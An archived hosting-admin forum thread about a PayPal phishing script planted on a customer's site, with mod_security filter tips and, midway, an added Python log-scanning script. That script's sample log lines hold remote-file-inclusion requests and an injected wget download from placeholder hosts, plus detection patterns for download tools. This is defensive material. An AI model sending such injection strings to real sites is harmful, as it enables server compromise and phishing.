The Community Forums


PayPal hijack -- FYI

Discussion in 'General Discussion' started by laborspy, Jun 7, 2006.

  1. laborspy

    laborspy Well-Known Member

    Joined:
    Feb 7, 2004
    Messages:
    94
    Likes Received:
    0
    Trophy Points:
    6
    One of my users was hijacked today. It appears that someone used his website to upload a script named '.pay.php'. It was a PayPal hijacking script.


    Here is what the script looked like.
    http://www.devtop.com/bad.no

    Prevent via mod_security add
     
    #1 laborspy, Jun 7, 2006
    Last edited: Jun 7, 2006
  2. WEB-PROS

    WEB-PROS Well-Known Member

    Joined:
    Feb 19, 2006
    Messages:
    111
    Likes Received:
    0
    Trophy Points:
    16
    With that mod_security filter, can't they just change the name of the file?
     
  3. bmcgrail

    bmcgrail Well-Known Member

    Joined:
    Dec 8, 2003
    Messages:
    83
    Likes Received:
    0
    Trophy Points:
    6
    Here are a few mod_security filters I use to stop repeated abuse attempts against insecure scripts.

    SecFilter pathtoashnews=
    SecFilter absolute_path=
    SecFilter root_path=

    Grep your domain logs for the pay.php, and then do it for wget and look for the command right before http://remoteip. Then block that so they can't upload any scripts. wget won't show 100% of exploits, but it's a good start.
     
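As an added example (not code from the thread or from any of its posters), here is the log triage bmcgrail describes above, done in Python against a few constructed Apache combined-format log lines: it flags query parameters whose value is a remote URL (the vector the `pathtoashnews=` / `absolute_path=` / `root_path=` filters target), flags wget-style download commands inside parameter values (the step that drops a file like `.pay.php`), collects the remote hosts to block, and emits mod_security 1.x SecFilter lines keyed on the parameter name plus a remote scheme rather than on the dropped filename, which is the answer to WEB-PROS's point that a filter on the filename is evaded by renaming it. The sample hosts, paths, the parameter names `cmd` and `page`, and the `(https?|ftp)://` pattern are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format log lines for illustration; the hosts, paths
# and parameter names are invented and are not taken from the forum thread.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Jun/2006:10:14:02 -0400] "GET /news/show.php?pathtoashnews=http://198.51.100.9/c.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [07/Jun/2006:10:14:05 -0400] "GET /news/show.php?pathtoashnews=http://198.51.100.9/c.txt?&cmd=wget%20http://198.51.100.9/.pay.php HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
198.51.100.42 - - [07/Jun/2006:10:15:11 -0400] "GET /index.php?page=about HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.15 - - [07/Jun/2006:10:16:40 -0400] "GET /gallery/theme.php?absolute_path=https://192.0.2.200/shell.gif HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
"""

# The fields of the combined log format that the scan needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a remote URL: the include-path injection.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# A download command followed by the URL it fetches: the dropper step.
FETCH_RE = re.compile(
    r'\b(wget|curl|fetch|lynx)\b[^;|`]*?((?:https?|ftp)://\S+)', re.IGNORECASE
)


def scan_log(log_text):
    """Return one record per suspicious parameter value found in the log."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m['target'])
        # parse_qsl URL-decodes values, so "wget%20http://" becomes readable.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            base = {'client': m['ip'], 'time': m['ts'], 'path': target.path,
                    'status': int(m['status']), 'param': name}
            if REMOTE_URL_RE.match(value):
                hits.append(dict(base, kind='remote-include',
                                 remote=urlsplit(value).hostname))
            fm = FETCH_RE.search(value)
            if fm:
                hits.append(dict(base, kind='download', tool=fm.group(1).lower(),
                                 remote=urlsplit(fm.group(2)).hostname))
    return hits


def remote_hosts(hits):
    """Hosts the attacker pulled code from: the addresses to block."""
    return sorted({h['remote'] for h in hits if h['remote']})


def secfilter_rules(hits):
    """mod_security 1.x SecFilter lines keyed on the injected parameter name plus
    a remote scheme, so renaming the dropped file (.pay.php) does not evade them."""
    params = sorted({h['param'] for h in hits if h['kind'] == 'remote-include'})
    return ['SecFilter "%s=(https?|ftp)://"' % p for p in params]


if __name__ == '__main__':
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print('%(client)s %(path)s %(kind)s via %(param)s -> %(remote)s' % h)
    print('block:', ', '.join(remote_hosts(found)))
    print('\n'.join(secfilter_rules(found)))
```

Run as-is it reports three remote-include hits and one wget download, names the two remote hosts to block, and prints a SecFilter line for `pathtoashnews` and one for `absolute_path`. On a real server, feed it the domain's access log (on cPanel hosts these typically live under /usr/local/apache/domlogs/) instead of SAMPLE_LOG. One caveat: the access log only records the query string, so injections carried in a POST body will not show up here; that is the "won't show 100% of exploits" part of the advice above.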
  4. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
  5. netlook

    netlook Well-Known Member
    PartnerNOC

    Joined:
    Mar 25, 2004
    Messages:
    335
    Likes Received:
    0
    Trophy Points:
    16
  6. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    I have contacted the developer for more information regarding this. Without seeing an active attack yet I cannot write a rule set for it at this time.
     
  7. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    The developers will not provide this; I'm not surprised.

    Fantastico sure is doing a great job at keeping our systems secure by updating with the software providers. Latest version on Coppermine website is 1.4.8

    Latest stable Fantastico is
    New Installation (1.4.2)
     
  8. easyhoster1

    easyhoster1 Well-Known Member

    Joined:
    Sep 25, 2003
    Messages:
    659
    Likes Received:
    0
    Trophy Points:
    16
    Latest cPanel version is... Coppermine (1.3.3) :rolleyes:
     